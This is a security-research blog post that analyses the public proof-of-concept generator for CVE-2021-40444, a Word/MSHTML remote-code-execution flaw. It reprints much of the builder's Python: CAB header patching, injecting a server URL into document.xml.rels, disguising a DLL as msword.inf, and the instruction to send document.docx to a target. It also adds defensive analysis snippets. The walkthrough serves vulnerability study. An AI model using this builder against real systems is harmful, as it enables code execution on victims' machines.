For Aspiring Exploit Devs

Today

Reading a blog post about reverse engineering motivated me so much that I decided to start a series of my own!

I am a security researcher and I specialize in Windows vulnerability research (VR).

There are many directions one can take when it comes to VR, but at the end of the day it usually comes down to how much “risk” we are taking in performing the analysis. If a sample is a complete black box with stripped symbols, heavy obfuscation, and other anti-analysis measures, then we’re taking on quite a bit of risk, especially if we have no initial indicators of what kind of vulnerability we want to find in the sample in the first place.

Without going off on too many tangents, the truth is that there are much easier ways to go about discovering new vulnerabilities. One way to find new vulns is by understanding old ones. Of the many reasons to do this, the most notable one for today is that patches aren’t always all-encompassing. If an issue is fixed in one part of the program, there is no guarantee it is also fixed in another part where the same issue happens to exist. Sometimes even the first part isn’t fixed correctly to begin with!

Although this approach is pretty standard for the industry, I want to save discussion of it for future posts. Today I want to take a moment to understand not the vulnerability, but the exploit. Learning to understand exploits is another route one can take in vulnerability research, since the logic behind one exploit can be reused to build others. Furthermore, there are times when you will first encounter an exploit that’s already being used in the wild, and you will need to reverse engineer how the vulnerability works from that direction instead.

CVE-2021-40444

The folks over at lockedbyte developed a Proof of Concept (PoC) for CVE-2021-40444 by doing exactly what is detailed above. They obtained the sample with SHA256 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 and analyzed it to understand the exploit it was using in the wild. The sample is a .docx file that can trigger remote code execution. According to official Microsoft reporting, the vulnerability is in MSHTML and an attacker can craft a malicious ActiveX control that is triggered by a document hosting the browser rendering engine.
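If you get your hands on a copy of the sample, it is worth confirming that it is the same file before analyzing it. Here is a minimal sketch of that check using Python's hashlib; the function names and the chunk size are my own choices for illustration and are not part of the PoC.

```python
import hashlib

# The SHA256 quoted above for the in-the-wild sample.
EXPECTED_SHA256 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"


def sha256_of_file(path, chunk_size=65536):
    """Return the hex SHA256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # Read until handle.read() returns an empty bytes object (end of file).
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_expected(path, expected=EXPECTED_SHA256):
    """Compare a file's digest against the expected value, ignoring case."""
    return sha256_of_file(path) == expected.lower()
```

Calling matches_expected on the path of a downloaded file returns True only if it is byte-for-byte the sample referenced here.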

With all of this information under our belt, we can now look at the main components of the Python code that generates the malicious document (maldoc), see what is technically going on under the hood, and better understand how the exploit works. Based on the descriptions in the PoC, we should expect to be looking at a logic bug.

usage()

def usage():
	print('[%] Usage: ' + str(sys.argv[0]) + ' <generate/host> <options>')
	print('[i] Example: ' + str(sys.argv[0]) + ' generate test/calc.dll hxxp://192.168.1[.]41')
	print('[i] Example: sudo ' + str(sys.argv[0]) + ' host 80')
	exit()

The usage function helps get a better grasp on the inputs being used to generate the maldoc. We can briefly check it out to see what we can pass through, which in this case seems to be our malicious DLL that we want to load on the target system, as well as some remote address we may want the sample to connect to. For the sake of this analysis, we will focus more on how the payload is generated.

patch_cab()

...
m_off = 0x2d
...
def patch_cab(path):
	f_r = open(path, 'rb')
	cab_content = f_r.read()
	f_r.close()
	
	out_cab = cab_content[:m_off]
	out_cab += b'\x00\x5c\x41\x00'
	out_cab += cab_content[m_off+4:]

	out_cab = out_cab.replace(b'..\\msword.inf', b'../msword.inf')
	
	f_w = open(path, 'wb')
	f_w.write(out_cab)
	f_w.close()
	return

The patch_cab function is interesting since it expects a .cab file as input. The .cab extension stands for cabinet, a file that “contains several compressed files as a file library.” In this case, the PoC reads in the contents of the file and overwrites the 4 bytes at offset 0x2d with \x00\x5c\x41\x00; because the second slice resumes at m_off+4, nothing is inserted and the file length does not change. It also replaces the byte string ..\msword.inf (written as ..\\msword.inf in the Python literal, where the backslash is escaped) with ../msword.inf, and writes the result back to the same cabinet file that was passed in as the parameter.

We can’t draw any solid conclusions from the information we have so far, but these are interesting notes to keep track of. Additionally, the middle two of the four patched bytes, 0x5c and 0x41, are \A in ASCII, with a null byte on either side. This could be a red herring, but it is worth noting.
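To convince ourselves that the slicing in patch_cab overwrites bytes rather than inserting them, here is a small sketch that applies the same operation to a dummy buffer. The 64-byte buffer is a hypothetical stand-in and not a real cabinet file, and overwrite_at is a helper name I made up for the demo.

```python
M_OFF = 0x2D                     # same offset as m_off in the PoC
PATCH = b"\x00\x5c\x41\x00"      # same four bytes the PoC writes


def overwrite_at(data, offset, patch):
    """Return a copy of data with len(patch) bytes replaced starting at offset."""
    return data[:offset] + patch + data[offset + len(patch):]


# Hypothetical stand-in for a cabinet file: 64 filler bytes, not a real CAB.
original = bytes(range(64))
patched = overwrite_at(original, M_OFF, PATCH)

# Same length before and after, so nothing was inserted.
print(len(original) == len(patched))
# Everything after the four patched bytes is untouched and has not shifted.
print(patched[M_OFF + 4:] == original[M_OFF + 4:])
# The two middle bytes of the patch decode to a backslash followed by 'A'.
print(PATCH[1:3].decode("ascii"))
```

Both comparisons print True, which matches the reading above: the four bytes starting at 0x2d are replaced in place.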

generate_payload()

This function is rather lengthy, so we can break it down into sections. Essentially, the script reads the file provided as the first parameter and writes it to a new file, data/word.dll. It then executes the command cp -r data/word_dat/ data/tmp_doc/ to copy the contents of data/word_dat/ to data/tmp_doc/. The contents of data/word_dat/ are already provided in the repo, and they appear to be the skeleton of an empty .docx file.

After this is done, the script writes the URL that was provided as the second parameter into word/_rels/document.xml.rels.

print('[*] Writing HTML Server URL...')
	
rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r')
xml_content = rels_pr.read()
rels_pr.close()
	
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
	
rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
rels_pw.write(xml_content)
rels_pw.close()

The file modified here, document.xml.rels, defines relationships to the additional parts the document requires. Pointing one of those relationships at the supplied URL is the way to trigger the URL loading when the victim interacts with the document. The next step in the PoC is generating the malicious .docx itself, which simply zips up the temporary directory as document.docx.
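When looking at a suspicious document from the analysis side, the same file is a good place to start. Below is a rough sketch that lists every relationship marked as external in a relationships part. The sample XML is entirely made up (the Ids, Types, and Targets are placeholders), and external_targets is my own helper name; only the namespace is the standard one used by Office Open XML packages.

```python
import xml.etree.ElementTree as ET

# Namespace used by relationship parts in Office Open XML packages.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(rels_xml):
    """Return (Id, Target) pairs for relationships with TargetMode="External"."""
    root = ET.fromstring(rels_xml)
    return [
        (rel.get("Id"), rel.get("Target"))
        for rel in root.iter(RELS_NS + "Relationship")
        if rel.get("TargetMode") == "External"
    ]


# Hypothetical relationships part; every Id, Type, and Target here is invented.
SAMPLE_RELS = """
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://example.invalid/type/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://example.invalid/type/object"
                Target="http://example.invalid/word.html" TargetMode="External"/>
</Relationships>
""".strip()

print(external_targets(SAMPLE_RELS))
```

Only the second relationship is reported, since the first one points at a part inside the package. An external target pointing at an unfamiliar host is exactly the kind of thing this PoC plants.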

print('[*] Generating malicious docx file...')
	
os.chdir('data/tmp_doc/')
os.system('zip -r document.docx *')
execute_cmd('cp document.docx ../../out/document.docx')
os.chdir('../')
execute_cmd('rm -R tmp_doc/')
os.chdir('../')

With the maldoc itself done, the real magic happens in the generation of the malicious CAB file, which is where the patch_cab function we saw earlier comes in. This part of the PoC copies the malicious DLL from word.dll to msword.inf, so the payload now carries an .inf name. The new file is then packed into a cabinet file named out.cab with the lcab command. This out.cab file is what gets passed to patch_cab, and the patched result is copied to srv/word.cab, so the cabinet is hosted on the server rather than embedded in the document. This is likely where the logic bug comes into play: the malicious DLL is disguised as an .inf file inside a cabinet whose header bytes and stored file name have been tampered with.

print('[*] Generating malicious CAB file...')

os.chdir('data/')
execute_cmd('mkdir cab/')
execute_cmd('cp word.dll msword.inf')
os.chdir('cab/')
execute_cmd('lcab \'../msword.inf\' out.cab')
patch_cab('out.cab')
execute_cmd('cp out.cab ../../srv/word.cab')
os.chdir('../')
execute_cmd('rm word.dll')
execute_cmd('rm msword.inf')
execute_cmd('rm -R cab/')
os.chdir('../')
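One way to test whether the four patched bytes land on something meaningful is to read the cabinet header and see where offset 0x2d falls relative to the first file entry. The sketch below parses the fixed 36-byte CFHEADER from the Microsoft Cabinet format and reads coffFiles, the offset of the first CFFILE entry. The header built at the bottom is synthetic, and setting its coffFiles to 0x2C is purely an assumption for illustration; I have not checked that the out.cab produced by lcab uses that value. The function names are hypothetical as well.

```python
import struct

# Fixed part of CFHEADER in the Microsoft Cabinet format: 36 bytes, little-endian.
# Fields: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
# versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet.
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")


def first_file_entry_offset(cab_bytes):
    """Return coffFiles, the offset of the first CFFILE entry in the cabinet."""
    fields = CFHEADER.unpack_from(cab_bytes, 0)
    signature, coff_files = fields[0], fields[4]
    if signature != b"MSCF":
        raise ValueError("not a cabinet file: missing MSCF signature")
    return coff_files


def describe_patch(cab_bytes, patch_offset=0x2D, patch_len=4):
    """Return each patched byte's position relative to the first CFFILE entry."""
    start = first_file_entry_offset(cab_bytes)
    # A CFFILE entry begins with cbFile (4 bytes) and then uoffFolderStart (4 bytes).
    return [off - start for off in range(patch_offset, patch_offset + patch_len)]


# Synthetic header only (no real folders or data); coffFiles = 0x2C is assumed.
fake = CFHEADER.pack(b"MSCF", 0, 0x40, 0, 0x2C, 0, 3, 1, 1, 1, 0, 0, 0) + bytes(28)
print(describe_patch(fake))
```

Under that assumption the patch would cover relative positions 1 through 4 of the entry, meaning the upper three bytes of cbFile and the first byte of uoffFolderStart. Running describe_patch against a real out.cab before patching would show whether that holds for the PoC.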

The rest of the PoC updates the HTML page that the document points to so that it references the hosted CAB file, after which the document is ready to be delivered.

print('[*] Updating information on HTML exploit...')

os.chdir('srv/')
execute_cmd('cp backup.html word.html')

p_exp = open('word.html', 'r')
exploit_content = p_exp.read()
p_exp.close()

exploit_content = exploit_content.replace('<HOST_CHANGE_HERE>', srv_url + '/word.cab')

p_exp = open('word.html', 'w')
p_exp.write(exploit_content)
p_exp.close()

os.chdir('../')

print('[+] Malicious Word Document payload generated at: out/document.docx')
print('[+] Malicious CAB file generated at: srv/word.cab')
print('[i] You can execute now the server and then send document.docx to target')

We have now taken a deep dive into how the maldoc is created and the payload finalized. However, there is clearly further research to be done, as the repository contains more information about the files hosted at the URL, as well as other network activity related to making this exploit work. Regardless, this is a good exercise for getting started with VR using publicly accessible knowledge, and we will do more of it in posts to come!

Further Reading

This is an interesting and simple way to get started with VR in your off time and to learn about new vulnerabilities that are out there. Repositories like PoC-in-GitHub offer a compiled list of readily available PoCs that one can go through and try to understand for personal development. I intend to write more in-depth explanations of other approaches and to document them better for higher quality articles. In the meantime, this is what I have for you now :)